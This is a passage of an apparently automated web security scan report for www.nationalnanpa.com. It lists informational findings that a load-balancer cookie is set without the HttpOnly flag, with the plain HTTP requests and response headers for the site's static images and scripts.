The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/fastTrack_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:59 GMT
ETag: "a0033-3eef-486e3972f4bc0"
Accept-Ranges: bytes
Content-Length: 16111
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.63. http://www.nationalnanpa.com/content/img/feedBack_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/feedBack_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/feedBack_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 16:02:34 GMT
ETag: "28773-5d-4871cd1b55a80"
Accept-Ranges: bytes
Content-Length: 93
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

13.64. http://www.nationalnanpa.com/content/img/hp_img_a.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/hp_img_a.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_a.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:49 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "28789-55b7-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 21943
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.65. http://www.nationalnanpa.com/content/img/hp_img_b.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/hp_img_b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_b.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "2877d-56fa-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 22266
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.66. http://www.nationalnanpa.com/content/img/leftNav_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/leftNav_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/leftNav_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:39:01 GMT
ETag: "a004a-40-486e2a7b17b40"
Accept-Ranges: bytes
Content-Length: 64
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

13.67. http://www.nationalnanpa.com/content/img/legal_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/legal_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/legal_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:34 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 17:58:29 GMT
ETag: "28785-5c-486e216bc1b40"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

13.68. http://www.nationalnanpa.com/content/img/mainbg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/mainbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/mainbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:15 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a003a-1ea-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 490
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.69. http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:21:00 GMT
ETag: "28770-1fa-486e0ba1b7300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.70. http://www.nationalnanpa.com/content/img/nav_acMap_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_acMap_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2877e-5cc-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1484
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.71. http://www.nationalnanpa.com/content/img/nav_acMap_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_acMap_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0031-5ce-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1486
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.72. http://www.nationalnanpa.com/content/img/nav_act_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_act_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a002e-501-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1281
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.73. http://www.nationalnanpa.com/content/img/nav_act_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_act_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a004d-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.74. http://www.nationalnanpa.com/content/img/nav_login_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_login_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2876a-530-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.75. http://www.nationalnanpa.com/content/img/nav_login_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_login_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28784-530-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.76. http://www.nationalnanpa.com/content/img/nav_numRes_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_numRes_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "28764-62c-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.77. http://www.nationalnanpa.com/content/img/nav_numRes_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_numRes_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a003f-62c-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.78. http://www.nationalnanpa.com/content/img/nav_pub_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_pub_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_pub_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0045-542-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1346
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.79. http://www.nationalnanpa.com/content/img/nav_pub_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_pub_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_pub_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28778-543-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1347
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.80. http://www.nationalnanpa.com/content/img/nav_rep_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_rep_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2878a-502-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

...[SNIP]...

13.81. http://www.nationalnanpa.com/content/img/nav_rep_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_rep_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0035-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.82. http://www.nationalnanpa.com/content/img/nav_tools_off.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_tools_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0026-491-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.83. http://www.nationalnanpa.com/content/img/nav_tools_on.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_tools_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0036-491-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

...[SNIP]...

13.84. http://www.nationalnanpa.com/content/img/subContent_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/subContent_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/subContent_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:27 GMT
ETag: "a004f-5c-471ab6ce2ecc0"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/


13.85. http://www.nationalnanpa.com/content/js/browser_ie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/browser_ie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/browser_ie.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:27 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:28 GMT
ETag: "28755-248a-471ab6cf22f00"
Accept-Ranges: bytes
Content-Length: 9354
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q58="style.visibility=\"visible\"";q59="style.visibility=\"hidden\"";q82=null;q93=null;q94=null;q95=null;strict=(q147)&&(document.compatMode=="CSS1Compat");if((q150)&&(document.doctype)){tval=document
...[SNIP]...

13.86. http://www.nationalnanpa.com/content/js/dqm_loader.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/dqm_loader.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/dqm_loader.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:23 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:29 GMT
ETag: "2875f-d36-471ab6d017140"
Accept-Ranges: bytes
Content-Length: 3382
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q18=0;q19=new Array();q61 =false;q105=null;q123=false;textSize=0;b1="window";b2="";b3="";b4="";c1="";d1="";b2="host";b3="name";c1=String.fromCharCode(99);d1=String.fromCharCode(100);if(document.all ||
...[SNIP]...

13.87. http://www.nationalnanpa.com/content/js/nanpa_nav.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/js/nanpa_nav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/nanpa_nav.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
